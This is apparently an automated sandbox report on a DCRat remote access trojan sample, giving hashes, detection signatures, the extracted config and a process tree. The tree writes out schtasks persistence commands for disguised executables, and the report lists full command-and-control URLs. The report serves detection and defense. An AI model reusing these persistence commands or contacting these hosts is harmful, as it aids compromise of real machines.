Edit tour

Windows Analysis Report
LisectAVT_2403002A_442.exe

Overview

General Information

Sample name:	LisectAVT_2403002A_442.exe
Analysis ID:	1482252
MD5:	519c9f6fedeb43a8d129230fed9a2108
SHA1:	534ce363aa81cba33e01330d449c081f6b5e4f87
SHA256:	2c9593138be6c386946e31595ccdd5550922ef3fdd843fbb5f1e83634c223a2a
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected DCRat

AI detected suspicious sample

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files to the user root directory

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

LisectAVT_2403002A_442.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_442.exe" MD5: 519C9F6FEDEB43A8D129230FED9A2108)

wscript.exe (PID: 7596 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7676 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

perfCrtmonitorsvcMonitorDll.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

schtasks.exe (PID: 7796 cmdline: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WWanAPI\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7824 cmdline: schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\user\jOMfQSwRhTi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7876 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\ShellNew\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7900 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\hh\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Recovery\jOMfQSwRhTi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7952 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

w32tm.exe (PID: 8012 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WinStore.App.exe (PID: 7284 cmdline: "C:\Windows\ShellNew\WinStore.App.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

dwm.exe (PID: 8040 cmdline: C:\Windows\System32\WWanAPI\dwm.exe MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

explorer.exe (PID: 8052 cmdline: C:\Windows\hh\explorer.exe MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

jOMfQSwRhTi.exe (PID: 8068 cmdline: C:\Recovery\jOMfQSwRhTi.exe MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

dwm.exe (PID: 336 cmdline: "C:\Windows\System32\WWanAPI\dwm.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

jOMfQSwRhTi.exe (PID: 4712 cmdline: "C:\Recovery\jOMfQSwRhTi.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

explorer.exe (PID: 3476 cmdline: "C:\Windows\hh\explorer.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"TAG": "", "MUTEX": "DCR_MUTEX-T1MjNIJ2enwqXQ7I5jKv", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": null, "AS": false, "ASO": false, "ASP": "%UsersFolder% - Fast", "AK": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2129f8:$s8: Win32_ComputerSystem 0x212b08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x212ba6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x212cbc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10e8a0:$cnc4: POST / HTTP/1.1
Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7728	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7728	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9f9dd:$s8: Win32_ComputerSystem 0x9fa54:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9faa2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9fb2c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1dcb8:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ProcessId: 7728, TargetFilename: C:\Windows\System32\WWanAPI\dwm.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ProcessId: 7728, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jOMfQSwRhTi

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_442.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe, ParentProcessId: 7516, ParentProcessName: LisectAVT_2403002A_442.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7596, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_442.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe, ParentProcessId: 7516, ParentProcessName: LisectAVT_2403002A_442.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7596, ProcessName: wscript.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\hh\explorer.exe, CommandLine: C:\Windows\hh\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\hh\explorer.exe, NewProcessName: C:\Windows\hh\explorer.exe, OriginalFileName: C:\Windows\hh\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\hh\explorer.exe, ProcessId: 8052, ProcessName: explorer.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_442.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe, ParentProcessId: 7516, ParentProcessName: LisectAVT_2403002A_442.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7596, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\System32\WWanAPI\dwm.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ProcessId: 7728, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WWanAPI\dwm.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WWanAPI\dwm.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ParentProcessId: 7728, ParentProcessName: perfCrtmonitorsvcMonitorDll.exe, ProcessCommandLine: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WWanAPI\dwm.exe'" /rl HIGHEST /f, ProcessId: 7796, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ParentProcessId: 7728, ParentProcessName: perfCrtmonitorsvcMonitorDll.exe, ProcessCommandLine: schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe'" /rl HIGHEST /f, ProcessId: 7852, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_442.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe, ParentProcessId: 7516, ParentProcessName: LisectAVT_2403002A_442.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7596, ProcessName: wscript.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.9 - Destination IP: 141.8.197.42

Timestamp:	2024-07-25T20:04:33.742524+0200
SID:	2034194
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.9 - Destination IP: 141.8.197.42

Timestamp:	2024-07-25T20:04:41.933578+0200
SID:	2034194
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.9

Timestamp:	2024-07-25T20:04:52.562535+0200
SID:	2022930
Source Port:	443
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.9 - Destination IP: 141.8.197.42

Timestamp:	2024-07-25T20:04:08.629608+0200
SID:	2034194
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.9

Timestamp:	2024-07-25T20:04:14.996897+0200
SID:	2022930
Source Port:	443
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.9 - Destination IP: 141.8.197.42

Timestamp:	2024-07-25T20:04:18.091116+0200
SID:	2034194
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.9 - Destination IP: 141.8.197.42

Timestamp:	2024-07-25T20:04:25.140282+0200
SID:	2034194
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.9 - Destination IP: 141.8.197.42

Timestamp:	2024-07-25T20:04:08.372160+0200
SID:	2034194
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.9 - Destination IP: 141.8.197.42

Timestamp:	2024-07-25T20:04:08.270891+0200
SID:	2034194
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002A_442.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://a0583448.xsph.ru/HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5v	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13	Avira URL Cloud: Label: malware
Source: http://a0583448.xsph.ru/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Recovery\jOMfQSwRhTi.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\System32\WWanAPI\dwm.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Recovery\jOMfQSwRhTi.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Windows\ShellNew\WinStore.App.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Recovery\jOMfQSwRhTi.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Windows\hh\explorer.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343

Found malware configuration

Source: jOMfQSwRhTi.exe.4712.24.memstrmin

Malware Configuration Extractor: DCRat {"TAG": "", "MUTEX": "DCR_MUTEX-T1MjNIJ2enwqXQ7I5jKv", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": null, "AS": false, "ASO": false, "ASP": "%UsersFolder% - Fast", "AK": false, "AD": false}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Recovery\jOMfQSwRhTi.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\WWanAPI\dwm.exe	Joe Sandbox ML: detected
Source: C:\Recovery\jOMfQSwRhTi.exe	Joe Sandbox ML: detected
Source: C:\Windows\ShellNew\WinStore.App.exe	Joe Sandbox ML: detected
Source: C:\Recovery\jOMfQSwRhTi.exe	Joe Sandbox ML: detected
Source: C:\Windows\hh\explorer.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002A_442.exe

Joe Sandbox ML: detected

Source: LisectAVT_2403002A_442.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: LisectAVT_2403002A_442.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: LisectAVT_2403002A_442.exe

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_006EA5F4
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_006FB8E0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_0070AAA8 FindFirstFileExA,	0_2_0070AAA8

Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42
Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42

